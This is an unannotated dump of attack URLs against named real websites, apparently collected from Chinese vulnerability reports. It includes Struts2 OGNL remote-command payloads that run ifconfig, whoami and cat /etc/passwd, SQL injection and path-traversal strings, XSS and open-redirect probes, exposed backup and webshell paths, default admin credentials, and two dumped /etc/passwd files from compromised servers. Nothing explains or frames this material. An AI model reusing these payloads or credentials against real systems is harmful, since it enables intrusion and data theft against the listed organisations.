http://www.aoshitang.com/login.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://as.aoshitang.com/validatecode.xhtml?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 
http://www.zzsf.com/validatecode.xhtml?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://mj.aoshitang.com/validatecode.xhtml?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://www.channelsoft.com/casedetail.jsp?type=0&contentid=15 http://www.channelsoft.com/casedetail.jsp?type=0&contentid=15 http://www.channelsoft.com/casedetail.jsp?type=0&contentid=15 http://mobile.youku.com/index/wireless http://www.rhedu.gov.cn/zhuanti/xueke/default.aspx?FID=59 http://www.rhedu.gov.cn/zhuanti/mingshi/default.aspx?FID=62 http://www.xwjy.org/tresearch/wgindex.jsp?cid=00025&wgid=WG_186150 http://www.xlzx.sdu.edu.cn/jpkc/pass.php?pid=1055 http://www.xlzx.sdu.edu.cn/jpkc/pass.php?pid=1055 minisite.youku.com/myicetea/view.php http://218.3.204.146:7001/wscxxuzhou/ http://218.3.204.146:7001/console 
http://bbs.aoshitang.com http://bbs.aoshitang.com/thread-813631-93.html http://hfwap.mywtv.cn/jttq.do http://show.mywtv.cn/index.php?p=6&s=01'%20and%20'1'='1 http://plugin.mywtv.cn/weatherPub/WeatherIframeService?siteKey=/../../../..//etc/sysconfig/network-scripts/ifcfg-eth0%00 http://hudong.mywtv.cn/xiuba/attachment/201305/30/28374_1369898591O0QQ.jpg.thumb.jpg/.php http://yjszs.hfut.edu.cn/news.php?id=188 http://archives.lzu.edu.cn/pub/search/default.asp?id=10): http://dawww.nju.edu.cn/dazngl/New_Folder_index/dxyh-1.htm http://gc.astd.cn/AstdGateway/validateCode.action?_dc=1373816329043 http://gc.zzsf.com/ZzGateway/login.action?login_error=1 http://www.game-reign.com/validateCode.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://ww.gic.ac.cn/gic_news/list.php?type=1 http://klpr.ibcas.ac.cn/admin/index.asp http://www.ems.com.cn/ec-web/register/register_toIndex.action http://hjhx.rcees.ac.cn/hjhx/loginAction.action http://219.136.241.241:15004/xdf!gotoOrder.action?ptype=iphone5 http://219.136.241.241:15004/login.jsp后台弱口令admin http://www.jiankongbao.com/server_create.php?server_id=1 http://www.jiankongbao.com/server_create.php?server_id=2 http://www.jiankongbao.com/server_create.php?server_id=9 http://www.tianjingas.com/tjsinfo/index/index.action http://www.tianjin-air.com/en/login.action?request_locale=en_US http://www.superdata.com.cn/ 
http://www.superdata.com.cn/hack.txt http://old.superdata.com.cn/直接EXP拿下一句话木马。 http://report.tianjin-air.com/frontend/nonreg/nonRegLogin.action http://et.tianjin-air.com/flight/multiway.action http://www.aoshitang.com/WEB-INF/web.xml http://xlfc.changyou.com/shop/article!list.action?id=8a861a5e3e3118d1013e311b12360003 http://rzzx.kingdee.com/student/woeldtdetail.do?id=3 http://www.cgirls.cn/cgirl.php?type=%e8%bf%b7%e4%ba%ba%e6%80%a7%e6%84%9f http://www.cgirls.cn/cgirl.php?type=%e8%bf%b7%e4%ba%ba%e6%80%a7%e6%84%9f http://www.cgirls.cn/cgirl.php?type=%e8%bf%b7%e4%ba%ba%e6%80%a7%e6%84%9f http://www.cgirls.cn/cgirl.php?type=%e8%bf%b7%e4%ba%ba%e6%80%a7%e6%84%9f http://www.reocar.com/.svn/entries http://www.reocar.com/blog/.svn/entries http://monitor.aoshitang.com http://www.rufengda.com/newscenter/list?cateid=2&page=2 http://www.cn-arcn.com/webdata http://www.cn-arcn.com/newshow.asp?id=397 http://nba.hupu.com/admin/match_add/match.php http://jjwxc.aoshitang.com/mingjiang/content/169 http://jjwxc.aoshitang.com/mingjiang/content/169%20and%201=1 http://jjwxc.aoshitang.com/mingjiang/content/169%20and%201=2 http://jtzs.games7080.com/news/show.php?news_id=224 http://jtzs.games7080.com/yxzl/infoview.php?news_id=3 http://mhfx.games7080.com/activity/show.php?news_id=255 http://mhfx.games7080.com/media/show.php?news_id=240 http://mhfx.games7080.com/notice/show.php?news_id=129 http://www.cqcn.org/ http://www.cqcn.org/js/ http://www.cqcn.org/keys/ http://www.cqcn.org/Templates/ http://www.cqcn.org/fckeditor/ http://www.xinyangcb.cn/onews.asp?id=578 http://www.xinyangcb.cn/ONEWS.asp?id=59 http://www.xinyangcb.cn/admin http://www.xinyangcb.cn/admin/editor/upload.asp http://www.zzsf.com/WEB-INF/web.xml http://mj.aoshitang.com/WEB-INF/web.xml http://as.aoshitang.com/WEB-INF/web.xml 
http://hotel.lvee.cn:9090/HBE/Hotel/HotelInfoSearchAction.action?User_ID=&Serial_no=&WebFlag=Y&MODULE=CAN378_hotel_new.htm&Corp_ID=CAN378&conditions.cityCode=GZP&conditions.checkIn=2013.05.04&conditions.checkOut=2013.05.05&conditions.queryType=A&hotelId=SSTHL http://icp.now.cn/admin/login.php http://icp.now.cn/admin/index.php http://gdgz.gdin.cn/searchResourceList.do?resourceName=aa http://www.xinnet.com/views/mail/script/mail.jsp http://www.atc.sgcc.com.cn/temporary/ http://secaqb.anquanbao.org/xss.php?gcode=.%3Cscript%20src=http://localhost/1.js%3E http://mantis.fantong.com http://www.post.gx.cn http://gh.post.gx.cn/index1.php?category=mod_content&id=2131 http://baidu.com http://gh.post.gx.cn/admin/20060522091908/ http://gh.post.gx.cn/test/ http://gh.post.gx.cn/test/class/ http://211.138.242.136/info.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 http://211.138.242.136/php/ http://secaqb.anquanbao.org/sqlin.php?id='.aaa.'%20or%201 xxx.jpg/1.php xxx.jpg/1.2.php http://www.soft.zjut.edu.cn/admin/index.do http://lasercenter.ipc.ac.cn/intro/memberdetail.asp?id=1 http://lasercenter.ipc.ac.cn/news/noticedetail.asp?id=8 http://lasercenter.ipc.ac.cn/news/newsdetail.asp?id=44 http://lefen.lenovo.com//Home/ http://chita.lenovo.com/Home/Lib/ http://chita.lenovomm.com/Admin/Runtime/ http://wenda.so.com/index/ask?to_qid=150374392&to_name=wooyun%22%3E%3Cimg%20src=1%20onerror=alert%28%22wooyun%22%29%3E http://dhwy.dahe.cn/database.rar http://xyjj.dahe.cn/web1.rar http://yn.dahe.cn/l.rar http://zyjjq.dahe.cn/1.txt http://zyjjq.dahe.cn/2.txt http://223.4.48.77/main.ht# user:admin pass:123456 http://www.gscass.cn/download/uploadpic.jsp?pfilepath=imgpath ssrsj.ss.gov.cn/zhuce/index.asp http://g.youc.com/ http://g.youc.com/plus/mytag_js.php?aid=9090 http://www.henan100.com/go/q.php?id=238 http://www.henan100.com/go/q.php?id=-238%27+union+all+select+1,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4,5,6+and+%27x%27=%27x 
http://www.henan100.com/go/q.php?id=-238%27+union+all+select+1,2,load_file%280x2F6574632F706173737764%29,4,5,6+and+%27x%27=%27x http://info.qibebt.cas.cn/biofuels/showdetailnews/?recordid=6 http://mdata.ivpp.ac.cn:8080/special/admin/login.jsp http://fast.bao.ac.cn/showNews.php?Action=News&ID=67 http://fast.bao.ac.cn/Pic.php?Action=Pic&ID=23 http://www.llas.ac.cn/dtviewfile9.aspx?index=1 http://nzc.iap.ac.cn/news.jsp?lng=c&opr=view&id=483 http://nzc.iap.ac.cn/user.jsp?lng=c&opr=view&userid=18 http://nzc.iap.ac.cn/upfile.jsp?lng=c&filetype=ppt&opr=view&id=48 http://cmsr.iap.ac.cn/?p=36 http://cmsr.iap.ac.cn/?p=46 http://cmsr.iap.ac.cn/?a=view&p=50 http://cmsr.iap.ac.cn/?a=view&p=50 http://images.wandafilm.com/ http://www.theskinfoodus.com/upload_files/temp/diy.asp http://www.theskinfoodus.com/upload_files/temp/lt.aspx http://www.ce.zjut.edu.cn/admin/main.jsp www.post183.net http://www.post183.net/post183/postinfo/news/news.php?id=17039 http://www.post183.net/post183/dangjian/view.php?id=17039 http://www.post183.net/post183/dangjian/moreinfo.php?ss=3%27 http://www.post183.net/post183/dangjian/index.php http://www.post183.net/post183/common/login.htm http://www.zz185.com/news.asp?id=598 http://210.32.200.192/hcOA/index.do http://qhec.gov.cn/sitefiles/ http://nst.pku.edu.cn/article.php?sid=6576 http://dev.t.qq.com http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/s2-017.html http://struts.apache.org/release/2.3.x/docs/s2-016.html http://struts.apache.org/release/2.3.x/docs/s2-017.html http://www.gomesell.com/interfaces/search/showSearchResult.action?redirect:http://www.wooyun.org/ http://www.hhhtcz.gov.cn/Data/Backup/20130711.bak http://www.hhhtcz.gov.cn/Data/#@#@#@#@db.mdb http://58.83.206.34/login/start.action?redirectAction:http://www.google.com/%EF%BC%8523 http://app.music.360buy.com/client_download.action?redirectAction:http://www.google.com/%EF%BC%8523 
http://58.83.206.108/login/index.action?redirectAction:http://www.google.com/%EF%BC%8523 http://58.83.206.105/index.action?redirectAction:http://www.google.com/%EF%BC%8523 http://hr.vivo.com.cn/index.php?c=social_job&m=detailOne&id=67 http://hr.vivo.com.cn/admin.php http://500wan.3g.qq.com/3g/buy/dlc/dlckp_index.action?redirect:http://www.wooyun.org http://telhosting.xinnet.com/g2/login.action?redirect:http://www.wooyun.com/ http://sms.m.qunar.com/login.action http://sms.m.qunar.com/login.action?redirect:http://wooyun.org http://sms.m.qunar.com/login.action?action https://irbcast.nokia.com/nmds/stationOwnership!getSelectedStation.action http://union.zt.sohu.com/index.action http://data.yule.sohu.com/movie/showtime/index.action?redirect:http://www.wooyun.org http://mail.cgdc.com.cn:8080/gw/admin/index.php eyouuser:eyou_admin http://ddp.buaa.edu.cn/read.asp?id=98 http://bbs.cntv.cn/iframe/index.php?tid=26494153'%20and%20'1'='1&method=showlist&module=bbsindex&jsonpcallback=jsonp_wooyun http://www.so.com/s?q=intitle%3A%E5%90%8E%E5%8F%B0%E7%AE%A1%E7%90%86+%E7%94%A8%E6%88%B7%E5%90%8D POC:http://hsxt.mofcom.gov.cn/MOFCOM/manage.action?redirectAction:http://www.google.com/%23 http://search.ifeng.com/sofeng/search.action http://www.miitbeian.gov.cn/state/outPortal/loginPortal.action http://www.miitbeian.gov.cn/state/outPortal/loginPortal.action?redirect:http://www.baidu.com/ http://wm123.baidu.com/login.action?redirect:http://www.yahoo.com/ 
http://m.jd.com/ware/search.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22netstat%22%29,%23xx%3dnew%20java.lang.String%28%22-an%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://home.jd.com/myjd_index.action?redirect:http://www.yahoo.com/ http://ka.game.163.com/cardsystem/card!search.action http://im.gm.163.com/login.action http://product.mobile.163.com/data!newproduct.action http://im.gm.163.com/login.action?queuecode=pk http://im.gm.163.com/login.action?redirect:http://www.yahoo.com/ http://editor.tudou.com/examinate/system/login.do http://love.baihe.com/Reg.action,官方给的poc是,http://host/struts2-blank/example/X.action?action:%25{3*4 http://love.baihe.com/Reg.action?redirectAction:http://www.google.com/%23 http://www.jsspw.gov.cn/website/jsapprove/jsApproveSiteAction.action http://data.euro2012.qq.com/eurocupTencent/eurocup/euroLive.action encap:Ethernet MTU:1480 txqueuelen:1000 login.tudou.com/xiaonei/sina/auth.action存在struts2命令执行漏洞 http://plm.7daysinn.cn/account/login.action http://vip.sohu.com/registerinit.action http://union.zt.sohu.com/reset_pwd.action http://event8.wanmei.com/wulin2/wlrangergrace/wlRangerPage.action event20.wanmei.com/mhzx/newlevelprize/newLevel.action event9.wanmei.com/wulin2/wlinformation/insertInform!list.action event21.wanmei.com/shenmo/findbug1/findbug!getIndexLists.action site:duowan.com filetype:action。 http://link.duowan.com/user!login.action http://tougao.duowan.com/user!login.action mail.wo.com.cn/mail/login.action mail.wo.com.cn/mail/login.action?redirect:http://www.baidu.com/ http://union.sogou.com/login.action 
http://vip.sohu.com/registerinit.action http://vip.sohu.com/registerinit.action?redirect:http://www.yahoo.com/ http://fenxiao.jiwu.com/agent!login.action http://fenxiao.jiwu.com/agent!login.action?redirect:http://www.g.cn/ http://www.dianping.com/login http://career.cmbc.com.cn:8080/portal/notice/viewPortalNotice.action http://wksc.xywy.com/store-1607-0-1.html?keyword=88952634&max_price=100&min_price=1 url:union.xiu.com/sina/redirect.action http://www.dagexing.com/index/portal.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://360.baihe.com/iqgx/indexAction.action http://struts.apache.org/release/2.3.x/docs/s2-016.html http://giftcard.jd.com/exchange/index.action http://taocode.taobao.com/baoming/shop/shop.action http://b2b.sogou.com/search/pr.earch/products.do http://fw.jd.com/ser/detail.action?serviceCode=FW_GOODS-4803 http://gw.m.360buy.com/client.action http://jpns.m.360buy.com/client.action my.17173.com/app/seckill/f/activity/list.action 
http://act.sj.qq.com/bless/blog.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://t.people.com.cn/hebeizw.action?redirect:%24{%23a_str%3Dnew+java.lang.String%28%27ya%27%29%2C%23b_str%3Dnew+java.lang.String%28%27seng%27%29%2C%23a_resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23a_resp.getWriter%28%29.println%28%23a_str.concat%28%23b_str%29%29%2C%23a_resp.getWriter%28%29.flush%28%29%2C%23a_resp.getWriter%28%29.close%28%29 http://www.17k.com/book/getAuthInfo.action?redirect:${%23a%3d https://buy.cnooc.com.cn/smp/portal/login.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 
http://analytics.ws.netease.com/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://xm.zjkjt.gov.cn/redirect.action http://www.jste.net.cn/uids/login!login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://ees.chinasciencejournal.com/user/login.action?pageCode=Sci_Info http://xjgl.cdcedu.cn/desktop/login/login.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://slggkp.zjwater.gov.cn/zcps/login.action taocode.taobao.com/baoming/shop/shop.action http://www.bjcc.gov.cn/webpoll/vote.action http://pay.360buy.com/payment/page_bill.action http://gw.e.360buy.com使用Struts2框架,存在最新的s2-016命令执行漏洞。 
id.kingdee.com/oauth/authorize.action存在最新的 http://www.sjgj.cn/cpgs.action http://113.108.189.84:8080/page/desktop.html http://113.108.189.84:8080/webgis/index.jsp?userID= http://person.sac.net.cn/login.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 jifen.changyou.com/home/purchase.action http://www.tobaccobid.com/sofeng/search.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28%22whoami%22%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://qqh.wxcs.cn/news/getNewsList.action?redirect:${%23a%3d%28new root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false games:x:12:100:Games account:/var/games:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false ftp:x:40:49:FTP account:/srv/ftp:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash D-Bus:/var/run/dbus:/bin/false haldaemon:/var/run/hald:/bin/false daemon:/var/lib/sshd:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash news:x:9:13:News system:/etc/news:/bin/bash 
uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash uuidd:x:102:103:User uuidd:/var/run/uuidd:/bin/false quagga:x:103:106:Quagga daemon:/var/run/quagga:/usr/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false ldap:x:76:70:User OpenLDAP:/var/lib/ldap:/bin/bash mysql:x:60:109:MySQL admin:/var/lib/mysql:/bin/false dnsmasq:x:105:65534:dnsmasq:/var/lib/empty:/bin/false cyrus:x:96:12:User cyrus-imapd:/usr/lib/cyrus:/bin/bash vscan:x:65:110:Vscan account:/var/spool/amavis:/bin/false named:x:44:44:Name daemon:/var/lib/named:/bin/false at:x:25:25:Batch daemon:/var/spool/atjobs:/bin/bash squid:x:31:65534:WWW-proxy squid:/var/cache/squid:/bin/false ntp:x:74:111:NTP daemon:/var/lib/ntp:/bin/false mailman:x:72:67:GNU manager:/var/lib/mailman:/bin/bash fetchmail:x:106:2:mail daemon:/var/lib/fetchmail:/bin/false polkituser:x:107:112:PolicyKit:/var/run/PolicyKit:/bin/false pulse:x:108:113:PulseAudio daemon:/var/lib/pulseaudio:/bin/false dhcpd:x:109:65534:DHCP daemon:/var/lib/dhcp:/bin/false suse-ncc:x:110:115:Novell User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash gdm:x:111:116:Gnome daemon:/var/lib/gdm:/bin/false ftpsecure:x:112:65534:Secure User:/var/lib/empty:/bin/false strm:x:1221:1201::/home/huawei/mdn2000:/bin/bash strmftp:x:1222:1201::/home/ftpdir:/bin/bash wxcsqqh:x:1223:100::/home/wxcsqqh:/bin/bash oracle:x:300:107::/home/oracle:/bin/bash inst01:x:1224:100::/home/inst01:/usr/bin/ksh inst02:x:1225:100::/home/inst02:/usr/bin/ksh http://ka.game.163.com/thirdparty!login.action http://www.17wo.cn/Index.action http://61.178.73.23/sfc/newsInfo!findById.action?id=1239 
http://www.12308.com/web/index.action?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://eshop.sx.ct10000.com/product/index.action http://beian.zzidc.com/main/beian/showBeianInfo.action http://beian.zzidc.com/main/beian/showBeianInfo.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin 
postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash mysql-proxy:x:498:499:MySQL-Proxy user:/:/sbin/nologin www-users:x:500:500::/dev/null:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nginx:x:497:497::/home/nginx:/bin/bash http://score.baihe.com http://profile.baihe.com http://invite.baihe.com http://360.baihe.com http://psymatch.baihe.com http://search.baihe.com http://m.zhenai.com/about/service.do?redirect:${%23s%3dnew%20java.util.ArrayList%28%29,%23x%3dnew%20java.lang.String%28%22cat%22%29,%23xx%3dnew%20java.lang.String%28%22/etc/passwd%22%29,%23s.add%28%23x%29,%23s.add%28%23xx%29,%23a%3dnew%20java.lang.ProcessBuilder%28%23s%29.start%28%29.getInputStream%28%29,%23b%3dnew%20java.io.InputStreamReader%28%23a%29,%23c%3dnew%20java.io.BufferedReader%28%23b%29,%23d%3dnew%20char[51020],%23c.read%28%23d%29,%23dddddd%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23dddddd.println%28%23d%29,%23dddddd.close%28%29 http://www.gamepaopao.com/mayi.website/web!index.action http://www.js-study.cn/index.action http://315.stock.hexun.com/querystatisticsobject.action http://xxt.m-school.cn http://www.ems.com.cn/ec-web/login.action http://chat7.jd.com/index.action http://mobile.51bi.com/threadpay.do http://bj.chinaef.com/system/gotoLogin.action http://click.union.jd.com/statistic/redirectPage.action http://sz.chinaef.com/system/gotoLogin.action http://dev.wo.com.cn/appc/appcinfo_forwardAppcInformationIndexForDetail.action http://wap.17wo.cn 